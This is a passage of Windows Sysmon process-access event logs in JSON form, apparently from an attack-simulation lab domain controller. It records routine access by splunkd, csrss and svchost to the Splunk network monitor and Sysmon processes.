Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.069","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00101D120C00}","TargetProcessId":"672","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7455,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.069\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2242-5F25-0000-00101D120C00}\r\nTargetProcessId: 672\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.069","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2242-5F25-0000-00101D120C00}","TargetProcessId":"672","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7456,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.069\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.069","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7457,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.069\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.069","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7458,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.069\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.069","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7459,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.069\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.069","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7460,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.069\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.069","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7461,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.069\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.069","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:05:42","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:05:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7462,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:05:42.069\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:05:42.069","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\W